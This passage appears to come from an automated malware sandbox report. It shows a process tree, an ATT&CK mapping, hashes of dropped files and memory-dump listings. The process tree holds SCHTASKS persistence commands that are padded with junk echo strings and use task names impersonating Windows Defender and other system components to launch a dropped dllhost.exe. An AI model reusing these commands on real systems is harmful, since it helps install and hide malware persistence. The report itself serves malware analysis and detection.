      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2108
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 2хсGдб & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ЭЦн
    3⤵
    PID:5028
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo вкрр & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo оКW3p14XUдlгПcx
    3⤵
    PID:676
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3972
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Ю8ИжЩ5uzJзkX4юbq & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo mLvйН
    3⤵
    PID:2148
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4420
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 516
  2⤵
  - Program crash
  PID:3244

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4368

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\Dllhost\winlogson.exe

Filesize
7.8MB

MD5
5385a40c6af4c73f43cfa5de46b9f05a

SHA1
aec914b73e3c7b4efe0971d1a87e62de2b0776a4

SHA256
21bc43587dc1f19ec6271e69fe709b18fdefdfbfc5971a3edf00e92cb1b77995

SHA512
2273c25dcd4eb20c5cdf2d941a523362a680bbb341f2b64dcd17bbc40e66e60b2319fa0804cfa6303299b17ed6cd8d57b7e8efb465417b680370d922d8c89dd7

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
5a2812b775b17bc721ec808fe46cccdc

SHA1
b186895e093bffa131a3a7f936d75c8314f7ae2f

SHA256
72e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba

SHA512
8693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
db01a2c1c7e70b2b038edf8ad5ad9826

SHA1
540217c647a73bad8d8a79e3a0f3998b5abd199b

SHA256
413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d

SHA512
c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
44KB

MD5
7247129cd0644457905b7d6bf17fd078

SHA1
dbf9139b5a1b72141f170d2eae911bbbe7e128c8

SHA256
dfa6e0d79449f29310b2a0400dc7fa5a3a6b08182233147a81902d1f80a0f8e4

SHA512
9b1ebd7fe485811f10ec02778d90a7f7eccafa0231027b640b94eaed8408107051da7fcc4f17a9aa0eef900fa2595f44be7fd115331fb6da9b10076f5fcf87e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
6faff0ebd7c3554b8b1b66bdc7a8ed7f

SHA1
cc38cfcd0b4265eb2200f105c9ae46b3809beb72

SHA256
b5cf2e1865f49c705491963f07bbf48cd3a863e42e73c7f84b99e3edca282c3a

SHA512
ab424cc9603699a5285b75527892cd20ca3209cc01c4191171e7463d149434bd877c5b2a34443bc44e7502b58e35e2ecafd56bfef8f5d496e2aea2037f7b439d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
0b5d94d20be9eecbaed3dddd04143f07

SHA1
c677d0355f4cc7301075a554adc889bce502e15a

SHA256
3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c

SHA512
395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ea27e80a0b3f8c58459001a9a7bad2ca

SHA1
b7214538d54eb18fc2373b6eb30d06bee2cb7d57

SHA256
51085469ecb1042813fceacb1376d98fe6cd72e3596fcc4342ddb8b2f6f20419

SHA512
da0afe8520896588fbc8a14baf45f10deaaed646d72c5035a1ce8ab3907bb160379bdfef00f461ff66d563e725aee4c7df22821fb168fdc370b312f0596b892f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ea27e80a0b3f8c58459001a9a7bad2ca

SHA1
b7214538d54eb18fc2373b6eb30d06bee2cb7d57

SHA256
51085469ecb1042813fceacb1376d98fe6cd72e3596fcc4342ddb8b2f6f20419

SHA512
da0afe8520896588fbc8a14baf45f10deaaed646d72c5035a1ce8ab3907bb160379bdfef00f461ff66d563e725aee4c7df22821fb168fdc370b312f0596b892f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5664693aad18d91a43572d95f40a9ac2

SHA1
8afab3af415fa085f9c22ceb75661d227775286b

SHA256
711c4357e982cc07cea83064e2e4399fd6e54ee924660fc2d0acfc30f0a5085b

SHA512
54ee75c6cb947987c735d81bf0ec5b792364fb6176c5ced9c398b80d207a31899a2e623af7e43e386c4955f91e988798e80ec102d32f7b6e514b1602c0d99d9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
5664693aad18d91a43572d95f40a9ac2

SHA1
8afab3af415fa085f9c22ceb75661d227775286b

SHA256
711c4357e982cc07cea83064e2e4399fd6e54ee924660fc2d0acfc30f0a5085b

SHA512
54ee75c6cb947987c735d81bf0ec5b792364fb6176c5ced9c398b80d207a31899a2e623af7e43e386c4955f91e988798e80ec102d32f7b6e514b1602c0d99d9e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c889938217bb76ffe7d44b488d5004fa

SHA1
83b2517524c45714af5b4637656eed80e22ae153

SHA256
5c683fd12b56ac4e182668c28a7565f8a52b227c65a1ad3a211c0b3706e32bd2

SHA512
a2dba413dd59e7feba6ecee17fa0878c213e3ea0e2b50e02d9ace20120a885a4b6524fe6209d3fcc2a1bece2fd5f593ec0e393bca0c6f592eddb3c5778aa6973

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4ilkz1mj.vwe.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/1844-526-0x000000007EC30000-0x000000007EC40000-memory.dmp

Filesize
64KB

Download
memory/1844-411-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

Filesize
64KB

Download
memory/1844-539-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

Filesize
64KB

Download
memory/1844-746-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

Filesize
64KB

Download
memory/1844-751-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

Filesize
64KB

Download
memory/1844-1044-0x000000007EC30000-0x000000007EC40000-memory.dmp

Filesize
64KB

Download
memory/1844-412-0x0000000006AE0000-0x0000000006AF0000-memory.dmp

Filesize
64KB

Download
memory/2188-729-0x00000000077F0000-0x0000000007800000-memory.dmp

Filesize
64KB

Download
memory/2188-394-0x00000000008F0000-0x0000000000906000-memory.dmp

Filesize
88KB

Download
memory/2188-408-0x00000000077F0000-0x0000000007800000-memory.dmp

Filesize
64KB

Download
memory/2216-1721-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/2956-1713-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/3292-785-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/3292-417-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/3292-989-0x000000007E300000-0x000000007E310000-memory.dmp

Filesize
64KB

Download
memory/3292-528-0x000000007E300000-0x000000007E310000-memory.dmp

Filesize
64KB

Download
memory/3292-779-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/3292-590-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/3292-418-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/3564-121-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/3564-130-0x000000000B930000-0x000000000B93A000-memory.dmp

Filesize
40KB

Download
memory/3564-131-0x000000000BBB0000-0x000000000BC16000-memory.dmp

Filesize
408KB

Download
memory/3564-132-0x000000000BD10000-0x000000000BD20000-memory.dmp

Filesize
64KB

Download
memory/3564-129-0x000000000B980000-0x000000000BA12000-memory.dmp

Filesize
584KB

Download
memory/3564-128-0x000000000BDE0000-0x000000000C2DE000-memory.dmp

Filesize
5.0MB

Download
memory/3564-352-0x000000000BD10000-0x000000000BD20000-memory.dmp

Filesize
64KB

Download
memory/3732-983-0x000000007EAC0000-0x000000007EAD0000-memory.dmp

Filesize
64KB

Download
memory/3732-993-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/3732-409-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/3732-533-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/3732-501-0x0000000009AB0000-0x0000000009B55000-memory.dmp

Filesize
660KB

Download
memory/3732-410-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/3732-487-0x000000007EAC0000-0x000000007EAD0000-memory.dmp

Filesize
64KB

Download
memory/3732-407-0x00000000080B0000-0x0000000008400000-memory.dmp

Filesize
3.3MB

Download
memory/3732-420-0x0000000008510000-0x000000000855B000-memory.dmp

Filesize
300KB

Download
memory/3732-741-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/3732-735-0x0000000007260000-0x0000000007270000-memory.dmp

Filesize
64KB

Download
memory/4108-1708-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/4108-1709-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download
memory/4132-168-0x0000000009C00000-0x0000000009CA5000-memory.dmp

Filesize
660KB

Download
memory/4132-142-0x00000000086F0000-0x000000000870C000-memory.dmp

Filesize
112KB

Download
memory/4132-135-0x0000000007290000-0x00000000072C6000-memory.dmp

Filesize
216KB

Download
memory/4132-136-0x0000000007A90000-0x00000000080B8000-memory.dmp

Filesize
6.2MB

Download
memory/4132-137-0x0000000007450000-0x0000000007460000-memory.dmp

Filesize
64KB

Download
memory/4132-138-0x0000000007450000-0x0000000007460000-memory.dmp

Filesize
64KB

Download
memory/4132-139-0x0000000007960000-0x0000000007982000-memory.dmp

Filesize
136KB

Download
memory/4132-140-0x0000000008150000-0x00000000081B6000-memory.dmp

Filesize
408KB

Download
memory/4132-141-0x00000000083A0000-0x00000000086F0000-memory.dmp

Filesize
3.3MB

Download
memory/4132-163-0x000000007EE90000-0x000000007EEA0000-memory.dmp

Filesize
64KB

Download
memory/4132-374-0x0000000009D80000-0x0000000009D88000-memory.dmp

Filesize
32KB

Download
memory/4132-369-0x0000000009D90000-0x0000000009DAA000-memory.dmp

Filesize
104KB

Download
memory/4132-173-0x0000000009DF0000-0x0000000009E84000-memory.dmp

Filesize
592KB

Download
memory/4132-172-0x0000000007450000-0x0000000007460000-memory.dmp

Filesize
64KB

Download
memory/4132-143-0x0000000008A20000-0x0000000008A6B000-memory.dmp

Filesize
300KB

Download
memory/4132-162-0x0000000009890000-0x00000000098AE000-memory.dmp

Filesize
120KB

Download
memory/4132-144-0x0000000008AF0000-0x0000000008B66000-memory.dmp

Filesize
472KB

Download
memory/4132-161-0x0000000009AC0000-0x0000000009AF3000-memory.dmp

Filesize
204KB

Download
memory/4480-541-0x0000000004380000-0x0000000004390000-memory.dmp

Filesize
64KB

Download
memory/4480-763-0x0000000004380000-0x0000000004390000-memory.dmp

Filesize
64KB

Download
memory/4480-530-0x000000007EE30000-0x000000007EE40000-memory.dmp

Filesize
64KB

Download
memory/4480-757-0x0000000004380000-0x0000000004390000-memory.dmp

Filesize
64KB

Download
memory/4480-413-0x0000000004380000-0x0000000004390000-memory.dmp

Filesize
64KB

Download
memory/4480-414-0x0000000004380000-0x0000000004390000-memory.dmp

Filesize
64KB

Download
memory/4544-596-0x0000000004940000-0x0000000004950000-memory.dmp

Filesize
64KB

Download
memory/4544-537-0x000000007EE90000-0x000000007EEA0000-memory.dmp

Filesize
64KB

Download
memory/4544-415-0x0000000004940000-0x0000000004950000-memory.dmp

Filesize
64KB

Download
memory/4544-416-0x0000000004940000-0x0000000004950000-memory.dmp

Filesize
64KB

Download
memory/4544-775-0x0000000004940000-0x0000000004950000-memory.dmp

Filesize
64KB

Download
memory/4544-769-0x0000000004940000-0x0000000004950000-memory.dmp

Filesize
64KB

Download
memory/5040-1717-0x0000000000400000-0x0000000000EFC000-memory.dmp

Filesize
11.0MB

Download